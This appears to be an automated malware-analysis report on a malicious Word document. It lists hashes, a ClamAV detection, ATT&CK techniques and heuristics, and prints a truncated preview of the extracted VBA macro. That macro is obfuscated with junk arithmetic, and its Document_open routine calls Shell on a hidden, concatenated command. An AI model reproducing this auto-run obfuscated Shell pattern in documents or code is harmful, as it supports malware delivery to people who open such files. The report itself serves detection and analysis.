Office (OLE) malware analysis — malicious · 7cdc0a088a8a4a7c

MALICIOUS

Office (OLE)

383.8 KB Created: 2018-07-19 22:01:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: 4444789cdb956740588fe398c498b7d8 SHA-1: 69934b7390586c7e997715d6035934209bcbb354 SHA-256: 7cdc0a088a8a4a7c32def02e9c277afdf26bea37ae61390cd21aadfee895d32b

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is an Office document containing VBA macros. A critical heuristic firing indicates the presence of a Shell() call within the VBA code, suggesting it attempts to execute external commands. The ClamAV detection name 'Doc.Malware.Valyria-6744893-0' further confirms its malicious nature. The VBA macro's primary function appears to be executing a shell command, likely to download and execute a second-stage payload, which is a common technique for malware delivery.

Heuristics 5

ClamAV: Doc.Malware.Valyria-6744893-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6744893-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 57073 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	57073 bytes
SHA-256: `efd69becae3e381584d61a6634bc2e52ff2aa61885908ff9078309764fee254b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "CMhRuMUYwz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function tpUwMNTwZlvM() On Error Resume Next UhwzCk = CPfplF - HQoWEG + 94882 + 69231 * jsODiH + ozkOZ - 84064 * wPzVt / iARiBS * Zmaqpk hiRfl = iZrKnw - GUzCO + 86653 + 42596 * hnljH + dUidz - 91029 * ztHwBu / jHFiq * PlQlw IiIqw = AKBXw - LXPIo + 89313 + 70453 * aKJBJm + fSwmLv - 46266 * zphFDb / WVqPum * WulGf WkBHBM = aQwiA - oEaizY + 4584 + 38588 * vdsTm + umhYm - 99621 * wPsFzZ / YVPMP * twHzoQ UHjLiU = ElmSnc - THojX + 71393 + 77841 * KtrwWv + AEQYz - 55894 * BtZGwS / DwHJqD * wZIOIf Ezqjwd = FEIhqB - JarFMw + 1698 + 50623 * iCqns + EzjSCa - 95755 * bzXDQ / zXspiG * Yfjjr FojDv = qrArW - HpGFk + 6856 + 83767 * fajCL + kCXuY - 78103 * qtbSRw / oJQqfD * jjVFls oYOiZ = jiRJNw - GLlsZ + 56064 + 2193 * aNjDHT + ijkWnV - 19035 * iXZbmu / GwQWm * WFPnKX End Function Private Function UuczhadE() On Error Resume Next ulOUl = FhdiTt - OQKaj + 93015 + 1862 * oKUTU + wlVdl - 14645 * FrwUk / cJzKz * VrKLTt cXOSC = VGUdK - IILlfw + 9941 + 61091 * sErYlA + ooITWi - 75960 * GAlzsl / nlfZdl * QzCzUj sAZsQ = jVnRiS - ccMjTV + 57327 + 86705 * nkpBG + swZpiE - 29691 * SNDOp / fVhCI * UUrKjS WGbtAR = IvIEh - uIYOFw + 73386 + 47562 * ozVmwU + aCkEbz - 99290 * CUTnT / rGRva * mwNvvH MoCOs = cosojh - PuVQG + 76957 + 66497 * RCntGQ + HPGQo - 92600 * dLpWr / qdsSam * aVtdi End Function Private Function IisjUnUGShT() On Error Resume Next TDYnl = GaNzF - ikLNE + 87568 + 7112 * BwiXq + XfSjJd - 35792 * QoUPMX / aVNlB * OCLaY rFhwHO = hfzAa - VkXaH + 51302 + 44974 * zUIlr + bwNwpT - 89184 * zrzHE / iDqSO * ndwUY imTFEU = JpWIi - WCpnv + 18871 + 6689 * TnZRS + oKXzk - 36822 * BimjoS / USIjC * RSQfl VtkYL = mhkRA - HIGmj + 54971 + 98795 * Orudq + Vowwt - 45846 * EZVNSm / SbtlqG * NhqRs IWYBz = oaHjo - nwTWto + 64256 + 62227 * aaRmo + IcHFl - 12238 * YtPSR / ioSpZ * NVujR hKwtn = UhzSYY - MUTDG + 13420 + 83678 * tBfpPz + WtrLaF - 11888 * jssCzj / AjLrH * wNZiRb End Function Private Function QWrRfVqYaUjfiM() On Error Resume Next azrndc = FRYfK - luGLpb + 77185 + 80529 * jWVWbA + VvVFl - 83640 * LSmNQG / vFqtX * FSdzSv EmiwSS = LlRPAz - tXAdM + 66253 + 37458 * tobUF + rnsdEk - 73043 * AQbFh / KTYcl * fCiRz LGRFsM = sNYKR - NDLjG + 41548 + 51223 * UHSvH + IEwllu - 19526 * dCRBD / zEGKY * NRVwXq VSHAW = vdJEFu - vtCNX + 68641 + 15422 * QfcEDQ + RXnpu - 30913 * AfMuXZ / wlocj * YajuM rwzKlN = nRmZX - EZJSF + 33865 + 51126 * QAHWH + rizOuM - 44772 * fCGPq / LmTkBl * rMiSZ End Function Private Sub Document_open() On Error Resume Next BDflI = jBnisB - ZjcVlu + 51080 + 15492 * BfbPjm + PzRhp - 10746 * kHlzdO / zsbkZ * bEzmSM aBLKO = zWNhwE - QdGRI + 6495 + 23486 * diXsuF + rTCnt - 21572 * YZmism / lmTDPo * dYpoJ ToRTtp = tiJKKn - jidKZ + 68731 + 84224 * DpfQzN + MwjWfF - 70864 * KzzOr / KsEBG * tLdkFF Shell "" + KtItwYjbTzTDrO + wtbBnzfKvbKziP + CVar("c") + alwsrkQ + QHkFnkqzr + dTUEFJT + LaJnrfIm + YPpzwPPWafm + rjIINJIto + COCXnlTiBTj + lPVYKWKHB + SZcHXNzpic + cQFtNUhdIh + hFUdzvDjV + lhGmrzoZvi + iabbLYBc + uZiXLKJz + tzOiPYpI + itimN + EHiVnzz + Vlpjw + YzPoj + MKVXFifJSi + fMFrhkNiGKN + jSEsKUiBUB + JcGIqzXK + mKVjUU + OPzzzRK + qSsfE + AohbhUC + tikbSiDUT + ocrRzRKboIw + TKbVAosz, 0 VCVXQ = ODSrL - RWDCv + 50696 + 26759 * FCZji + SHmiU - 46779 * tSiVqz / qlLWPA * LnPRT rQBBU = QZizsV - GwspA + 32681 + 31472 * HAjsTI + FisfON - 99089 * zQpbX / QwRznV * IzsjK QRJBqj = zGNHJ - wuYKp + 86229 + 18383 * ESujnL + jAzErO - 70015 * HolqOQ / EpdObO * hrRNtM End Sub Private Function cjzHipTVRwdFk() On Error Resume Next SObKC = wlUcw - WYKBu + 81260 + 96110 * BNDrdX + FdkZvc - 24677 * iXLAb / rVVSk * hTzCJ WrOiKo = oHbBm - hwdFp + 8766 + 37622 * kaFOJ + QGuMPw - 33553 * Ujsdq / iWHkj * cAjli qqzSRD = YKCowT - dhjUl + 27551 + 3346 ... (truncated)

SHA-256: efd69becae3e381584d61a6634bc2e52ff2aa61885908ff9078309764fee254b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "CMhRuMUYwz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function tpUwMNTwZlvM()
On Error Resume Next
   UhwzCk = CPfplF - HQoWEG + 94882 + 69231 * jsODiH + ozkOZ - 84064 * wPzVt / iARiBS * Zmaqpk
   hiRfl = iZrKnw - GUzCO + 86653 + 42596 * hnljH + dUidz - 91029 * ztHwBu / jHFiq * PlQlw
   IiIqw = AKBXw - LXPIo + 89313 + 70453 * aKJBJm + fSwmLv - 46266 * zphFDb / WVqPum * WulGf
   WkBHBM = aQwiA - oEaizY + 4584 + 38588 * vdsTm + umhYm - 99621 * wPsFzZ / YVPMP * twHzoQ
   UHjLiU = ElmSnc - THojX + 71393 + 77841 * KtrwWv + AEQYz - 55894 * BtZGwS / DwHJqD * wZIOIf
   Ezqjwd = FEIhqB - JarFMw + 1698 + 50623 * iCqns + EzjSCa - 95755 * bzXDQ / zXspiG * Yfjjr
   FojDv = qrArW - HpGFk + 6856 + 83767 * fajCL + kCXuY - 78103 * qtbSRw / oJQqfD * jjVFls
   oYOiZ = jiRJNw - GLlsZ + 56064 + 2193 * aNjDHT + ijkWnV - 19035 * iXZbmu / GwQWm * WFPnKX
End Function
Private Function UuczhadE()
On Error Resume Next
   ulOUl = FhdiTt - OQKaj + 93015 + 1862 * oKUTU + wlVdl - 14645 * FrwUk / cJzKz * VrKLTt
   cXOSC = VGUdK - IILlfw + 9941 + 61091 * sErYlA + ooITWi - 75960 * GAlzsl / nlfZdl * QzCzUj
   sAZsQ = jVnRiS - ccMjTV + 57327 + 86705 * nkpBG + swZpiE - 29691 * SNDOp / fVhCI * UUrKjS
   WGbtAR = IvIEh - uIYOFw + 73386 + 47562 * ozVmwU + aCkEbz - 99290 * CUTnT / rGRva * mwNvvH
   MoCOs = cosojh - PuVQG + 76957 + 66497 * RCntGQ + HPGQo - 92600 * dLpWr / qdsSam * aVtdi
End Function
Private Function IisjUnUGShT()
On Error Resume Next
   TDYnl = GaNzF - ikLNE + 87568 + 7112 * BwiXq + XfSjJd - 35792 * QoUPMX / aVNlB * OCLaY
   rFhwHO = hfzAa - VkXaH + 51302 + 44974 * zUIlr + bwNwpT - 89184 * zrzHE / iDqSO * ndwUY
   imTFEU = JpWIi - WCpnv + 18871 + 6689 * TnZRS + oKXzk - 36822 * BimjoS / USIjC * RSQfl
   VtkYL = mhkRA - HIGmj + 54971 + 98795 * Orudq + Vowwt - 45846 * EZVNSm / SbtlqG * NhqRs
   IWYBz = oaHjo - nwTWto + 64256 + 62227 * aaRmo + IcHFl - 12238 * YtPSR / ioSpZ * NVujR
   hKwtn = UhzSYY - MUTDG + 13420 + 83678 * tBfpPz + WtrLaF - 11888 * jssCzj / AjLrH * wNZiRb
End Function
Private Function QWrRfVqYaUjfiM()
On Error Resume Next
   azrndc = FRYfK - luGLpb + 77185 + 80529 * jWVWbA + VvVFl - 83640 * LSmNQG / vFqtX * FSdzSv
   EmiwSS = LlRPAz - tXAdM + 66253 + 37458 * tobUF + rnsdEk - 73043 * AQbFh / KTYcl * fCiRz
   LGRFsM = sNYKR - NDLjG + 41548 + 51223 * UHSvH + IEwllu - 19526 * dCRBD / zEGKY * NRVwXq
   VSHAW = vdJEFu - vtCNX + 68641 + 15422 * QfcEDQ + RXnpu - 30913 * AfMuXZ / wlocj * YajuM
   rwzKlN = nRmZX - EZJSF + 33865 + 51126 * QAHWH + rizOuM - 44772 * fCGPq / LmTkBl * rMiSZ
End Function
Private Sub Document_open()
On Error Resume Next
   BDflI = jBnisB - ZjcVlu + 51080 + 15492 * BfbPjm + PzRhp - 10746 * kHlzdO / zsbkZ * bEzmSM
   aBLKO = zWNhwE - QdGRI + 6495 + 23486 * diXsuF + rTCnt - 21572 * YZmism / lmTDPo * dYpoJ
   ToRTtp = tiJKKn - jidKZ + 68731 + 84224 * DpfQzN + MwjWfF - 70864 * KzzOr / KsEBG * tLdkFF
Shell "" + KtItwYjbTzTDrO + wtbBnzfKvbKziP + CVar("c") + alwsrkQ + QHkFnkqzr + dTUEFJT + LaJnrfIm + YPpzwPPWafm + rjIINJIto + COCXnlTiBTj + lPVYKWKHB + SZcHXNzpic + cQFtNUhdIh + hFUdzvDjV + lhGmrzoZvi + iabbLYBc + uZiXLKJz + tzOiPYpI + itimN + EHiVnzz + Vlpjw + YzPoj + MKVXFifJSi + fMFrhkNiGKN + jSEsKUiBUB + JcGIqzXK + mKVjUU + OPzzzRK + qSsfE + AohbhUC + tikbSiDUT + ocrRzRKboIw + TKbVAosz, 0
   VCVXQ = ODSrL - RWDCv + 50696 + 26759 * FCZji + SHmiU - 46779 * tSiVqz / qlLWPA * LnPRT
   rQBBU = QZizsV - GwspA + 32681 + 31472 * HAjsTI + FisfON - 99089 * zQpbX / QwRznV * IzsjK
   QRJBqj = zGNHJ - wuYKp + 86229 + 18383 * ESujnL + jAzErO - 70015 * HolqOQ / EpdObO * hrRNtM
End Sub
Private Function cjzHipTVRwdFk()
On Error Resume Next
   SObKC = wlUcw - WYKBu + 81260 + 96110 * BNDrdX + FdkZvc - 24677 * iXLAb / rVVSk * hTzCJ
   WrOiKo = oHbBm - hwdFp + 8766 + 37622 * kaFOJ + QGuMPw - 33553 * Ujsdq / iWHkj * cAjli
   qqzSRD = YKCowT - dhjUl + 27551 + 3346
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.